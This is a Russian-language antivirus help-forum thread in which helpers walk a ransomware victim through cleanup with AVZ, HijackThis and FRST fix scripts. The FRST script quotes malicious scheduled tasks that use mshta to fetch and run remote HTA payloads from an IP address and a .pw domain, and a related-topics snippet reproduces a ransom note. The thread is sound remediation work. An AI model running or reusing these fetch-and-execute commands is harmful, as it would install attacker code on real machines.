Перейти к содержанию

Шифровальщик id-AEB8CE6B.[veracrypt@foxmail.com].adobe


Рекомендуемые сообщения

Здравствуйте, зашифрованы файлы на сервере. Интересует возможность восстановления/дешифрации файлов.

Логи согласно правилам оформления запроса о помощи во вложении.

CollectionLog-2019.02.25-18.21.zip

Изменено пользователем G1ueck
Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте!

 

Интересует возможность восстановления/дешифрации файлов

К сожалению, у нас такой возможности нет.

 

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\User3\AppData\Roaming\Microsoft\del.ps1', '');
 QuarantineFile('C:\Users\User3\AppData\Roaming\Microsoft\Network\PrivFalse.bat', '');
 DeleteSchedulerTask('OneDrive Sync');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1137');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337');
 DeleteFile('C:\Users\User3\AppData\Roaming\Microsoft\del.ps1', '64');
 DeleteFile('C:\Users\User3\AppData\Roaming\Microsoft\Network\PrivFalse.bat', '64');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
end.
Пожалуйста, перезагрузите компьютер вручную.

 

 

 

 

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

 

 

 

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

Прикрепите к следующему сообщению свежий CollectionLog.

Ссылка на комментарий
Поделиться на другие сайты

 

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

 

 

 

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

Прикрепите к следующему сообщению свежий CollectionLog.

 

 

KLAN-9680568597

В антивирусных базах информация по присланным вами файлам отсутствует:

del.ps1

 

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.

CollectionLog-2019.02.27-11.08.zip

Ссылка на комментарий
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O1 - Hosts: Reset contents to default
O4 - Startup other users: C:\Users\User3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_RETURN_FILES.txt
O4 - Startup other users: C:\Users\User7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\abb278f5f94f5be17c28e4761048b650.exe    ->    (PE EXE)

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    Task: {5D0E0807-9631-41BF-AC21-C10BCD3BD88E} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 => C:\Windows\System32\cmd.exe /c mshta hxxp://107.181.160.197/win/checking.hta <==== ATTENTION
    Task: {B4CFD127-2AA4-4296-8433-6CC33A7129B5} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 => C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <==== ATTENTION
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Перезагрузите компьютер вручную.

 

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • kocks33
      Автор kocks33
      Добрый день!
      На сервер проник шифровальщик. Зашифровал весь диск D, снял лицензию с сервера
      Можно ли как то расшифровать файлы. Помогите пожалуйста.


    • Беляш
      Автор Беляш
      Добрый день.
      не восстановил   белый лист для RDP  на роутере.
      Сегодня 2025.06.18 получил наказание.  Какие то архивы есть. Помогут они или нет можно  понять только после обеззараживания.
      Пострадало  две машины и  файловое хранилище
      Помогите пожалуйста с восстановлением.  
      файлы работы   frst  и  шифровальщика  во вложении.
       
      С уважением, Урянский Виктор
       
      primery.zip frst.zip
    • Павел Ф.
      Автор Павел Ф.
      Виртуальную машину с открытым извне не стандартным рдп портом зашифровал вирус KOZANOSTRA. Был установлен антивирус kaspersku Endpoint Securitu. 
      Помогите с расшифровкой. Система под переустановку, нужны файлы и базы
    • valkovaleksandr
      Автор valkovaleksandr
      Добрый день! Просьба помочь с  Шифровальщик cyberfear.
      Вот такая фигня вылазит при открытии текстовиков:
      Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences are yours)
      Your data is encrypted
      Your personal ID: *****sJm4WtmxxeX8*datastore@cyberfear.com
      Unfortunately for you, a major IT security weakness left you open to attack, your files have been encrypted
      The only method of recovering files is to purchase decrypt tool and unique key for you.
      If you want to recover your files, write us to this e-mail: datastore@cyberfear.com
      In case of no answer in 24 hours write us to this backup e-mail: back2up@swismail.com
      Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
      Contact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly.
      Attention!
      Do not rename encrypted files. 
      Do not try to decrypt your data using third party software - it may cause permanent data loss. 
      We are always ready to cooperate and find the best way to solve your problem. 
      The faster you write - the more favorable conditions will be for you. 
      Our company values its reputation. We give all guarantees of your files decryption.
      FRST.txt Addition.txt README_SOLVETHIS.txt Привет.docx Текстовый документ.txt
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
    • Caine
      Автор Caine
      Добрый день.  
      Поймал шифровальщика KOZANOSTRA. На ПК был открыт RDP.  Прошу помощи в расшифровке данных
×
×
  • Создать...